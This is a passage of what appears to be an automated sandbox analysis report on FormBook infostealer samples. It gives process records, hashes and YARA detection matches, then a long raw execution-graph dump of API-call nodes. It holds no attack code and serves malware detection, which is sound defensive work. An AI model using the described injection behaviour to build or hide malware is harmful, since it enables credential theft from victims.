                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:23:35:37
                                                      Start date:24/09/2024
                                                      Path:C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe"
                                                      Imagebase:0x980000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:6
                                                      Start time:23:35:39
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\SysWOW64\write.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\write.exe"
                                                      Imagebase:0xa50000
                                                      File size:10'240 bytes
                                                      MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:23:35:52
                                                      Start date:24/09/2024
                                                      Path:C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe"
                                                      Imagebase:0x980000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:23:36:04
                                                      Start date:24/09/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6bf500000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:8.8%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:36
                                                        execution_graph 84320 4010e0 84323 401100 84320->84323 84322 4010f8 84324 401113 84323->84324 84325 401182 84324->84325 84327 401120 84324->84327 84328 401184 84324->84328 84329 40114c 84324->84329 84326 40112c DefWindowProcW 84325->84326 84326->84322 84327->84326 84382 401000 Shell_NotifyIconW __call_reportfault 84327->84382 84361 401250 84328->84361 84330 401151 84329->84330 84331 40119d 84329->84331 84333 401219 84330->84333 84334 40115d 84330->84334 84336 4011a3 84331->84336 84337 42afb4 84331->84337 84333->84327 84340 401225 84333->84340 84338 401163 84334->84338 84339 42b01d 84334->84339 84335 401193 84335->84322 84336->84327 84346 4011b6 KillTimer 84336->84346 84347 4011db SetTimer RegisterWindowMessageW 84336->84347 84377 40f190 10 API calls 84337->84377 84343 42afe9 84338->84343 84344 40116c 84338->84344 84339->84326 84381 4370f4 52 API calls 84339->84381 84393 468b0e 74 API calls __call_reportfault 84340->84393 84379 40f190 10 API calls 84343->84379 84344->84327 84350 401174 84344->84350 84345 42b04f 84383 40e0c0 84345->84383 84376 401000 Shell_NotifyIconW __call_reportfault 84346->84376 84347->84335 84348 401204 CreatePopupMenu 84347->84348 84348->84322 84378 45fd57 65 API calls __call_reportfault 84350->84378 84355 42afe4 84355->84335 84356 42b00e 84380 401a50 331 API calls 84356->84380 84357 4011c9 PostQuitMessage 84357->84322 84360 42afdc 84360->84326 84360->84355 84362 4012e8 84361->84362 84363 401262 __call_reportfault 84361->84363 84362->84335 84394 401b80 84363->84394 84365 40128c 84366 4012d1 KillTimer SetTimer 84365->84366 84367 4012bb 84365->84367 84368 4272ec 84365->84368 84366->84362 84371 4012c5 84367->84371 84372 42733f 84367->84372 84369 4272f4 Shell_NotifyIconW 84368->84369 84370 42731a Shell_NotifyIconW 84368->84370 84369->84366 84370->84366 84371->84366 84375 427393 Shell_NotifyIconW 84371->84375 84373 427348 Shell_NotifyIconW 84372->84373 84374 42736e Shell_NotifyIconW 
85726->85724 85726->85725 85734 420494 __lseeki64_nolock 48 API calls 85727->85734 85732 417f77 __controlfp_s 46 API calls 85728->85732 85737 417f9d __dosmaperr 46 API calls 85729->85737 85757 41dd9b 85729->85757 85731 417f77 __controlfp_s 46 API calls 85730->85731 85735 41dfa1 85731->85735 85736 41db40 85732->85736 85741 41de5b 85733->85741 85743 41dc47 85733->85743 85733->85757 85738 41db67 85734->85738 85739 417f8a __write 46 API calls 85735->85739 85740 417f8a __write 46 API calls 85736->85740 85737->85757 85738->85726 85739->85757 85740->85714 85745 41ded0 ReadFile 85741->85745 85741->85757 85742 413748 _free 46 API calls 85742->85714 85744 41dcab ReadFile 85743->85744 85752 41dd28 85743->85752 85746 41dcc9 GetLastError 85744->85746 85755 41dcd3 85744->85755 85747 41deef GetLastError 85745->85747 85753 41def9 85745->85753 85746->85743 85746->85755 85747->85741 85747->85753 85748 41ddec MultiByteToWideChar 85749 41de10 GetLastError 85748->85749 85748->85757 85749->85729 85750 41dda3 85758 41dd60 85750->85758 85759 41ddda 85750->85759 85751 41dd96 85754 417f77 __controlfp_s 46 API calls 85751->85754 85752->85750 85752->85751 85752->85757 85752->85758 85753->85741 85756 420494 __lseeki64_nolock 48 API calls 85753->85756 85754->85757 85755->85743 85760 420494 __lseeki64_nolock 48 API calls 85755->85760 85756->85753 85757->85714 85757->85742 85758->85748 85761 420494 __lseeki64_nolock 48 API calls 85759->85761 85760->85755 85762 41dde9 85761->85762 85762->85748 85763->85647 85764->85665 85765->85648 85766->85657 85767->85665 85768->85658 85769->85657 85770->85667 85771->85666 85772->85665 85774 416b04 __malloc_crt 46 API calls 85773->85774 85775 420618 85774->85775 85775->85676 85776->85673 85777->85681 85781 4148b3 GetSystemTimeAsFileTime __aulldiv 85778->85781 85780 442c6b 85780->85287 85781->85780 85782->85295 85783->85299 85784->85299 85789 45272f __tzset_nolock _wcscpy 85785->85789 85786 4528a4 85786->85209 85786->85210 85787 414d04 61 API calls __fread_nolock 
85787->85789 85788 44afef GetSystemTimeAsFileTime 85788->85789 85789->85786 85789->85787 85789->85788 85790 4150d1 81 API calls _fseek 85789->85790 85790->85789 85792 44b1bc 85791->85792 85793 44b1ca 85791->85793 85794 4149c2 116 API calls 85792->85794 85795 44b1e1 85793->85795 85796 44b1d8 85793->85796 85797 4149c2 116 API calls 85793->85797 85794->85793 85826 4321a4 85795->85826 85796->85237 85798 44b2db 85797->85798 85798->85795 85800 44b2e9 85798->85800 85804 414a46 __fcloseall 82 API calls 85800->85804 85807 44b2f6 85800->85807 85801 44b224 85802 44b253 85801->85802 85803 44b228 85801->85803 85830 43213d 85802->85830 85806 44b235 85803->85806 85809 414a46 __fcloseall 82 API calls 85803->85809 85804->85807 85810 44b245 85806->85810 85811 414a46 __fcloseall 82 API calls 85806->85811 85807->85237 85808 44b25a 85812 44b260 85808->85812 85813 44b289 85808->85813 85809->85806 85810->85237 85811->85810 85815 44b26d 85812->85815 85817 414a46 __fcloseall 82 API calls 85812->85817 85840 44b0bf 87 API calls 85813->85840 85818 44b27d 85815->85818 85820 414a46 __fcloseall 82 API calls 85815->85820 85816 44b28f 85841 4320f8 46 API calls _free 85816->85841 85817->85815 85818->85237 85820->85818 85821 44b295 85822 44b2a2 85821->85822 85823 414a46 __fcloseall 82 API calls 85821->85823 85824 44b2b2 85822->85824 85825 414a46 __fcloseall 82 API calls 85822->85825 85823->85822 85824->85237 85825->85824 85827 4321cb 85826->85827 85829 4321b4 __tzset_nolock _memmove 85826->85829 85828 414d04 __fread_nolock 61 API calls 85827->85828 85828->85829 85829->85801 85831 4135bb _malloc 46 API calls 85830->85831 85832 432150 85831->85832 85833 4135bb _malloc 46 API calls 85832->85833 85834 432162 85833->85834 85835 4135bb _malloc 46 API calls 85834->85835 85836 432174 85835->85836 85838 432189 85836->85838 85842 4320f8 46 API calls _free 85836->85842 85838->85808 85839 432198 85839->85808 85840->85816 85841->85821 85842->85839 85843->85139 85844->85141 85845->85160 85846->85160 85847->85160 
85848->85156 85849->85160 85850->85160 85851->85164 85852->85174 85853->85173 85854->85173 85904 410160 85855->85904 85857 41012f GetFullPathNameW 85858 410147 moneypunct 85857->85858 85858->84995 85860 4102cb SHGetDesktopFolder 85859->85860 85861 410333 _wcsncpy 85859->85861 85860->85861 85862 4102e0 _wcsncpy 85860->85862 85861->84998 85862->85861 85863 41031c SHGetPathFromIDListW 85862->85863 85863->85861 85865 425f4a 85864->85865 85866 4101bb 85864->85866 85869 4114ab __wcsicoll 58 API calls 85865->85869 85872 425f6e 85865->85872 85867 410160 52 API calls 85866->85867 85868 4101c7 85867->85868 85908 410200 52 API calls 2 library calls 85868->85908 85869->85865 85871 4101d6 85909 410200 52 API calls 2 library calls 85871->85909 85872->85000 85874 4101e9 85874->85000 85876 40f760 126 API calls 85875->85876 85877 40f584 85876->85877 85878 429335 85877->85878 85879 40f58c 85877->85879 85882 4528bd 118 API calls 85878->85882 85880 40f598 85879->85880 85881 429358 85879->85881 85934 4033c0 113 API calls 7 library calls 85880->85934 85935 434034 86 API calls _wprintf 85881->85935 85885 42934b 85882->85885 85888 429373 85885->85888 85889 42934f 85885->85889 85886 429369 85886->85888 85887 40f5b4 85887->84996 85890 4115d7 52 API calls 85888->85890 85891 431e58 82 API calls 85889->85891 85903 4293c5 moneypunct 85890->85903 85891->85881 85892 42959c 85893 413748 _free 46 API calls 85892->85893 85894 4295a5 85893->85894 85895 431e58 82 API calls 85894->85895 85896 4295b1 85895->85896 85900 401b10 52 API calls 85900->85903 85903->85892 85903->85900 85910 444af8 85903->85910 85913 44b41c 85903->85913 85920 402780 85903->85920 85928 4022d0 85903->85928 85936 44c7dd 64 API calls 3 library calls 85903->85936 85905 410167 _wcslen 85904->85905 85906 4115d7 52 API calls 85905->85906 85907 41017e _wcscpy 85906->85907 85907->85857 85908->85871 85909->85874 85911 4115d7 52 API calls 85910->85911 85912 444b27 _memmove 85911->85912 85912->85903 85914 44b429 85913->85914 85915 4115d7 52 
API calls 85914->85915 85916 44b440 85915->85916 85917 44b45e 85916->85917 85918 401b10 52 API calls 85916->85918 85917->85903 85919 44b453 85918->85919 85919->85903 85921 402790 moneypunct _memmove 85920->85921 85922 402827 85920->85922 85923 4115d7 52 API calls 85921->85923 85924 4115d7 52 API calls 85922->85924 85925 402797 85923->85925 85924->85921 85926 4027bd 85925->85926 85927 4115d7 52 API calls 85925->85927 85926->85903 85927->85926 85929 4022e0 85928->85929 85931 40239d 85928->85931 85930 4115d7 52 API calls 85929->85930 85929->85931 85932 402320 moneypunct 85929->85932 85930->85932 85931->85903 85932->85931 85933 4115d7 52 API calls 85932->85933 85933->85932 85934->85887 85935->85886 85936->85903 85938 402417 85937->85938 85942 402539 moneypunct 85937->85942 85939 4115d7 52 API calls 85938->85939 85938->85942 85940 402443 85939->85940 85941 4115d7 52 API calls 85940->85941 85943 4024b4 85941->85943 85942->85004 85943->85942 85945 4022d0 52 API calls 85943->85945 85966 402880 95 API calls 2 library calls 85943->85966 85945->85943 85950 401566 85946->85950 85947 401794 85967 40e9a0 90 API calls 85947->85967 85950->85947 85951 40167a 85950->85951 85952 4010a0 52 API calls 85950->85952 85953 4017c0 85951->85953 85968 45e737 90 API calls 3 library calls 85951->85968 85952->85950 85953->85006 85955 40bc70 52 API calls 85954->85955 85964 40d451 85955->85964 85956 40d50f 85971 410600 52 API calls 85956->85971 85958 427c01 85972 45e737 90 API calls 3 library calls 85958->85972 85959 40e0a0 52 API calls 85959->85964 85961 401b10 52 API calls 85961->85964 85962 40d519 85962->85009 85964->85956 85964->85958 85964->85959 85964->85961 85964->85962 85969 40f310 53 API calls 85964->85969 85970 40d860 91 API calls 85964->85970 85966->85943 85967->85951 85968->85953 85969->85964 85970->85964 85971->85962 85972->85962 85973->85022 85974->85023 85976 4091c6 85975->85976 85977 42c5fe 85975->85977 85976->85083 85977->85976 85978 40bc70 52 API calls 85977->85978 85979 42c64e 
InterlockedIncrement 85978->85979 85980 42c665 85979->85980 85985 42c697 85979->85985 85983 42c672 InterlockedDecrement Sleep InterlockedIncrement 85980->85983 85980->85985 85981 42c737 InterlockedDecrement 85982 42c74a 85981->85982 85986 408f40 VariantClear 85982->85986 85983->85980 85983->85985 85984 42c731 85984->85981 85985->85981 85985->85984 86268 408e80 85985->86268 85988 42c752 85986->85988 86277 410c60 VariantClear moneypunct 85988->86277 85992 42c6db 85993 402160 52 API calls 85992->85993 85994 42c6e5 85993->85994 86273 45340c 85 API calls 85994->86273 85996 42c6f1 86274 40d200 52 API calls 2 library calls 85996->86274 85998 42c6fb 86275 465124 53 API calls 85998->86275 86000 42c715 86001 42c76a 86000->86001 86002 42c719 86000->86002 86004 401b10 52 API calls 86001->86004 86276 46fe32 VariantClear 86002->86276 86005 42c77e 86004->86005 86006 401980 53 API calls 86005->86006 86012 42c796 86006->86012 86007 42c812 86279 46fe32 VariantClear 86007->86279 86009 42c82a InterlockedDecrement 86280 46ff07 54 API calls 86009->86280 86011 42c864 86281 45e737 90 API calls 3 library calls 86011->86281 86012->86007 86012->86011 86278 40ba10 52 API calls 2 library calls 86012->86278 86014 42c9ec 86324 47d33e 331 API calls 86014->86324 86017 42c9fe 86325 46feb1 VariantClear VariantClear 86017->86325 86019 401980 53 API calls 86026 42c849 86019->86026 86020 408f40 VariantClear 86020->86026 86021 42ca08 86023 401b10 52 API calls 86021->86023 86022 42c874 86024 408f40 VariantClear 86022->86024 86032 42ca59 86022->86032 86027 42ca15 86023->86027 86025 42c891 86024->86025 86282 410c60 VariantClear moneypunct 86025->86282 86026->86014 86026->86019 86026->86020 86030 402780 52 API calls 86026->86030 86283 40a780 86026->86283 86029 40c2c0 52 API calls 86027->86029 86029->86022 86030->86026 86032->86032 86034 40afc4 86033->86034 86035 40b156 86033->86035 86036 40afd5 86034->86036 86037 42d1e3 86034->86037 86335 45e737 90 API calls 3 library calls 86035->86335 86041 40a780 194 API 
calls 86036->86041 86056 40b11a moneypunct 86036->86056 86336 45e737 90 API calls 3 library calls 86037->86336 86040 42d1f8 86046 408f40 VariantClear 86040->86046 86044 40b00a 86041->86044 86042 40b143 86042->85083 86044->86040 86047 40b012 86044->86047 86045 42d4db 86045->86045 86046->86042 86048 42d231 VariantClear 86047->86048 86049 40b04a 86047->86049 86055 40b094 moneypunct 86047->86055 86058 40b05c moneypunct 86048->86058 86049->86058 86337 40e270 VariantClear moneypunct 86049->86337 86050 40b108 86050->86056 86338 40e270 VariantClear moneypunct 86050->86338 86051 42d45a VariantClear 86051->86056 86053 4115d7 52 API calls 86053->86055 86055->86050 86057 42d425 moneypunct 86055->86057 86056->86042 86339 45e737 90 API calls 3 library calls 86056->86339 86057->86051 86057->86056 86058->86053 86058->86055 86060 408fff 86059->86060 86062 40900d 86059->86062 86340 403ea0 52 API calls __cinit 86060->86340 86064 42c3f6 86062->86064 86066 42c44a 86062->86066 86067 40a780 194 API calls 86062->86067 86068 42c47b 86062->86068 86072 42c4cb 86062->86072 86073 42c564 86062->86073 86077 42c548 86062->86077 86079 409112 86062->86079 86080 4090df 86062->86080 86082 42c528 86062->86082 86084 4090ea 86062->86084 86093 4090f2 moneypunct 86062->86093 86342 4534e3 52 API calls 86062->86342 86344 40c4e0 194 API calls 86062->86344 86343 45e737 90 API calls 3 library calls 86064->86343 86345 45e737 90 API calls 3 library calls 86066->86345 86067->86062 86346 451b42 61 API calls 86068->86346 86348 47faae 233 API calls 86072->86348 86074 408f40 VariantClear 86073->86074 86074->86093 86075 42c491 86075->86093 86347 45e737 90 API calls 3 library calls 86075->86347 86351 45e737 90 API calls 3 library calls 86077->86351 86078 42c4da 86078->86093 86349 45e737 90 API calls 3 library calls 86078->86349 86079->86077 86087 40912b 86079->86087 86080->86084 86085 408e80 VariantClear 86080->86085 86350 45e737 90 API calls 3 library calls 86082->86350 86089 408f40 VariantClear 86084->86089 
86085->86084 86087->86093 86341 403e10 53 API calls 86087->86341 86089->86093 86091 40914b 86092 408f40 VariantClear 86091->86092 86092->86093 86093->85083 86352 408d90 86094->86352 86096 429778 86379 410c60 VariantClear moneypunct 86096->86379 86098 408cf9 86098->86096 86100 42976c 86098->86100 86102 408d2d 86098->86102 86099 429780 86378 45e737 90 API calls 3 library calls 86100->86378 86368 403d10 86102->86368 86105 408d71 moneypunct 86105->85083 86106 408f40 VariantClear 86107 408d45 moneypunct 86106->86107 86107->86105 86107->86106 86109 425c87 86108->86109 86110 40d15f 86108->86110 86111 425cc7 86109->86111 86112 425ca1 TranslateAcceleratorW 86109->86112 86110->85083 86112->86110 86114 42602f 86113->86114 86117 40d17f 86113->86117 86114->85083 86115 42608e IsDialogMessageW 86116 40d18c 86115->86116 86115->86117 86116->85083 86117->86115 86117->86116 86653 430c46 GetClassLongW 86117->86653 86120 4096c6 _wcslen 86119->86120 86121 4115d7 52 API calls 86120->86121 86185 40a70c moneypunct _memmove 86120->86185 86122 4096fa _memmove 86121->86122 86124 4115d7 52 API calls 86122->86124 86123 4013a0 52 API calls 86125 4297aa 86123->86125 86126 40971b 86124->86126 86128 4115d7 52 API calls 86125->86128 86127 409749 CharUpperBuffW 86126->86127 86130 40976a moneypunct 86126->86130 86126->86185 86127->86130 86169 4297d1 _memmove 86128->86169 86177 4097e5 moneypunct 86130->86177 86655 47dcbb 196 API calls 86130->86655 86132 42a452 86133 408f40 VariantClear 86132->86133 86134 42ae92 86133->86134 86682 410c60 VariantClear moneypunct 86134->86682 86136 42aea4 86137 409aa2 86139 4115d7 52 API calls 86137->86139 86144 409afe 86137->86144 86137->86169 86138 40a689 86141 4115d7 52 API calls 86138->86141 86139->86144 86140 4115d7 52 API calls 86140->86177 86158 40a6af moneypunct _memmove 86141->86158 86142 409b2a 86146 429dbe 86142->86146 86206 409b4d moneypunct _memmove 86142->86206 86663 40b400 VariantClear VariantClear moneypunct 86142->86663 86143 40c2c0 52 API calls 
86143->86177 86144->86142 86145 4115d7 52 API calls 86144->86145 86147 429d31 86145->86147 86152 429dd3 86146->86152 86664 40b400 VariantClear VariantClear moneypunct 86146->86664 86151 429d42 86147->86151 86660 44a801 52 API calls 86147->86660 86148 429a46 VariantClear 86148->86177 86149 409fd2 86156 40a045 86149->86156 86205 42a3f5 86149->86205 86162 40e0a0 52 API calls 86151->86162 86152->86206 86665 40e1c0 VariantClear moneypunct 86152->86665 86153 408f40 VariantClear 86153->86177 86160 4115d7 52 API calls 86156->86160 86167 4115d7 52 API calls 86158->86167 86168 40a04c 86160->86168 86163 429d57 86162->86163 86661 453443 52 API calls 86163->86661 86165 42a42f 86669 45e737 90 API calls 3 library calls 86165->86669 86167->86185 86172 40a0a7 86168->86172 86173 4091e0 317 API calls 86168->86173 86681 45e737 90 API calls 3 library calls 86169->86681 86170 4299d9 86175 408f40 VariantClear 86170->86175 86189 40a0af 86172->86189 86670 40c790 VariantClear moneypunct 86172->86670 86173->86172 86174 429abd 86174->85083 86178 4299e2 86175->86178 86176 429d88 86662 453443 52 API calls 86176->86662 86177->86132 86177->86137 86177->86138 86177->86140 86177->86143 86177->86148 86177->86153 86177->86158 86177->86169 86177->86170 86177->86174 86183 40a780 194 API calls 86177->86183 86656 40c4e0 194 API calls 86177->86656 86658 40ba10 52 API calls 2 library calls 86177->86658 86659 40e270 VariantClear moneypunct 86177->86659 86657 410c60 VariantClear moneypunct 86178->86657 86183->86177 86185->86123 86187 408f40 VariantClear 86220 40a162 moneypunct _memmove 86187->86220 86188 402780 52 API calls 86188->86206 86190 40a11b 86189->86190 86191 42a4b4 VariantClear 86189->86191 86189->86220 86198 40a12d moneypunct 86190->86198 86671 40e270 VariantClear moneypunct 86190->86671 86191->86198 86192 40a780 194 API calls 86192->86206 86193 4115d7 52 API calls 86193->86206 86195 401980 53 API calls 86195->86206 86196 408e80 VariantClear 86196->86206 86197 4115d7 52 API calls 86197->86220 
86198->86197 86198->86220 86199 408e80 VariantClear 86199->86220 86201 44a801 52 API calls 86201->86206 86202 42a74d VariantClear 86202->86220 86203 41130a 51 API calls __cinit 86203->86206 86204 40a368 86207 42aad4 86204->86207 86214 40a397 86204->86214 86668 47390f VariantClear 86205->86668 86206->86149 86206->86165 86206->86185 86206->86188 86206->86192 86206->86193 86206->86195 86206->86196 86206->86201 86206->86203 86206->86205 86211 409c95 86206->86211 86666 45f508 52 API calls 86206->86666 86667 403e10 53 API calls 86206->86667 86674 46fe90 VariantClear VariantClear moneypunct 86207->86674 86208 42a7e4 VariantClear 86208->86220 86209 42a886 VariantClear 86209->86220 86211->85083 86212 40a3ce 86224 40a3d9 moneypunct 86212->86224 86675 40b400 VariantClear VariantClear moneypunct 86212->86675 86213 40e270 VariantClear 86213->86220 86214->86212 86239 40a42c moneypunct 86214->86239 86654 40b400 VariantClear VariantClear moneypunct 86214->86654 86217 4115d7 52 API calls 86217->86220 86218 42abaf 86223 42abd4 VariantClear 86218->86223 86232 40a4ee moneypunct 86218->86232 86219 4115d7 52 API calls 86222 42a5a6 VariantInit VariantCopy 86219->86222 86220->86187 86220->86199 86220->86202 86220->86204 86220->86207 86220->86208 86220->86209 86220->86213 86220->86217 86220->86219 86672 470870 52 API calls 86220->86672 86673 44ccf1 VariantClear moneypunct 86220->86673 86221 40a4dc 86221->86232 86677 40e270 VariantClear moneypunct 86221->86677 86222->86220 86226 42a5c6 VariantClear 86222->86226 86223->86232 86225 40a41a 86224->86225 86231 42ab44 VariantClear 86224->86231 86224->86239 86225->86239 86676 40e270 VariantClear moneypunct 86225->86676 86226->86220 86227 42ac4f 86233 42ac79 VariantClear 86227->86233 86237 40a546 moneypunct 86227->86237 86230 40a534 86230->86237 86678 40e270 VariantClear moneypunct 86230->86678 86231->86239 86232->86227 86232->86230 86233->86237 86234 42ad28 86240 42ad4e VariantClear 86234->86240 86245 40a583 moneypunct 86234->86245 86237->86234 
86238 40a571 86237->86238 86238->86245 86679 40e270 VariantClear moneypunct 86238->86679 86239->86218 86239->86221 86240->86245 86242 40a650 moneypunct 86242->85083 86243 42ae0e VariantClear 86243->86245 86245->86242 86245->86243 86680 40e270 VariantClear moneypunct 86245->86680 86246->85083 86247->85033 86248->85038 86249->85083 86250->85083 86251->85083 86252->85083 86253->85080 86254->85080 86255->85080 86256->85080 86257->85080 86258->85080 86259->85080 86261 403cdf 86260->86261 86262 408f40 VariantClear 86261->86262 86263 403ce7 86262->86263 86263->85076 86264->85080 86265->85080 86266->85083 86267->85030 86269 408e88 86268->86269 86271 408e94 86268->86271 86270 408f40 VariantClear 86269->86270 86270->86271 86272 45340c 85 API calls 86271->86272 86272->85992 86273->85996 86274->85998 86275->86000 86276->85984 86277->85976 86278->86012 86279->86009 86280->86026 86281->86022 86282->85976 86284 40a7a6 86283->86284 86285 40ae8c 86283->86285 86287 4115d7 52 API calls 86284->86287 86326 41130a 51 API calls __cinit 86285->86326 86322 40a7c6 moneypunct _memmove 86287->86322 86288 40a86d 86289 40a878 moneypunct 86288->86289 86301 40abd1 86288->86301 86297 40a884 moneypunct 86289->86297 86299 408f40 VariantClear 86289->86299 86290 401b10 52 API calls 86290->86322 86292 42b791 VariantClear 86292->86322 86293 40bc10 53 API calls 86293->86322 86294 40b5f0 89 API calls 86294->86322 86295 408e80 VariantClear 86295->86322 86296 42bb6a 86334 44b92d VariantClear 86296->86334 86297->86026 86298 42ba2d VariantClear 86298->86322 86299->86289 86300 42b459 VariantClear 86300->86322 86331 45e737 90 API calls 3 library calls 86301->86331 86303 408cc0 187 API calls 86303->86322 86304 42b6f6 VariantClear 86304->86322 86305 4115d7 52 API calls 86305->86322 86306 42bc5b 86306->86026 86307 40e270 VariantClear 86307->86322 86308 42bbf5 86332 45e737 90 API calls 3 library calls 86308->86332 86310 4115d7 52 API calls 86313 42b5b3 VariantInit VariantCopy 86310->86313 86312 408f40 VariantClear 
86312->86322 86314 42b5d7 VariantClear 86313->86314 86313->86322 86314->86322 86317 42bc37 86333 45e737 90 API calls 3 library calls 86317->86333 86320 42bc48 86320->86296 86321 408f40 VariantClear 86320->86321 86321->86296 86322->86288 86322->86290 86322->86292 86322->86293 86322->86294 86322->86295 86322->86296 86322->86298 86322->86300 86322->86301 86322->86303 86322->86304 86322->86305 86322->86307 86322->86308 86322->86310 86322->86312 86322->86317 86323 4530c9 VariantClear 86322->86323 86327 45308a 53 API calls 86322->86327 86328 470870 52 API calls 86322->86328 86329 457f66 87 API calls __write_nolock 86322->86329 86330 472f47 127 API calls 86322->86330 86323->86322 86324->86017 86325->86021 86326->86322 86327->86322 86328->86322 86329->86322 86330->86322 86331->86296 86332->86296 86333->86320 86334->86306 86335->86037 86336->86040 86337->86058 86338->86056 86339->86045 86340->86062 86341->86091 86342->86062 86343->86093 86344->86062 86345->86093 86346->86075 86347->86093 86348->86078 86349->86093 86350->86093 86351->86073 86353 4289d2 86352->86353 86354 408db3 86352->86354 86382 45e737 90 API calls 3 library calls 86353->86382 86380 40bec0 90 API calls 86354->86380 86357 408dc9 86358 4289e5 86357->86358 86361 428a05 86357->86361 86363 40a780 194 API calls 86357->86363 86364 408e64 86357->86364 86366 408f40 VariantClear 86357->86366 86367 408e5a 86357->86367 86381 40ba10 52 API calls 2 library calls 86357->86381 86383 45e737 90 API calls 3 library calls 86358->86383 86362 408f40 VariantClear 86361->86362 86362->86367 86363->86357 86365 408f40 VariantClear 86364->86365 86365->86367 86366->86357 86367->86098 86369 408f40 VariantClear 86368->86369 86370 403d20 86369->86370 86371 403cd0 VariantClear 86370->86371 86372 403d4d 86371->86372 86384 46e91c 86372->86384 86387 467897 86372->86387 86431 45e17d 86372->86431 86441 4755ad 86372->86441 86373 403d76 86373->86096 86373->86107 86378->86096 86379->86099 86380->86357 86381->86357 86382->86358 86383->86361 86444 
46e785 86384->86444 86386 46e92f 86386->86373 86388 4678bb 86387->86388 86420 467954 86388->86420 86546 45340c 85 API calls 86388->86546 86389 4115d7 52 API calls 86390 467989 86389->86390 86392 467995 86390->86392 86550 40da60 53 API calls 86390->86550 86396 4533eb 85 API calls 86392->86396 86393 4678f6 86395 413a0e __wsplitpath 46 API calls 86393->86395 86397 4678fc 86395->86397 86398 4679b7 86396->86398 86399 401b10 52 API calls 86397->86399 86400 40de40 60 API calls 86398->86400 86401 46790c 86399->86401 86403 4679c3 86400->86403 86547 40d200 52 API calls 2 library calls 86401->86547 86404 4679c7 GetLastError 86403->86404 86405 467a05 86403->86405 86407 403cd0 VariantClear 86404->86407 86410 467a2c 86405->86410 86411 467a4b 86405->86411 86406 467917 86406->86420 86548 4339fa GetFileAttributesW FindFirstFileW FindClose 86406->86548 86408 4679dc 86407->86408 86412 4679e6 86408->86412 86416 44ae3e CloseHandle 86408->86416 86415 4115d7 52 API calls 86410->86415 86413 4115d7 52 API calls 86411->86413 86419 408f40 VariantClear 86412->86419 86417 467a49 86413->86417 86414 467928 86418 46792f 86414->86418 86414->86420 86422 467a31 86415->86422 86416->86412 86426 408f40 VariantClear 86417->86426 86549 4335cd 56 API calls 3 library calls 86418->86549 86425 4679ed 86419->86425 86420->86389 86421 467964 86420->86421 86421->86373 86551 436299 52 API calls 2 library calls 86422->86551 86425->86373 86428 467a88 86426->86428 86427 467939 86427->86420 86429 408f40 VariantClear 86427->86429 86428->86373 86430 467947 86429->86430 86430->86420 86432 45e198 86431->86432 86433 45e19c 86432->86433 86434 45e1b8 86432->86434 86435 408f40 VariantClear 86433->86435 86436 45e1cc 86434->86436 86437 45e1db FindClose 86434->86437 86438 45e1a4 86435->86438 86439 45e1d9 moneypunct 86436->86439 86440 44ae3e CloseHandle 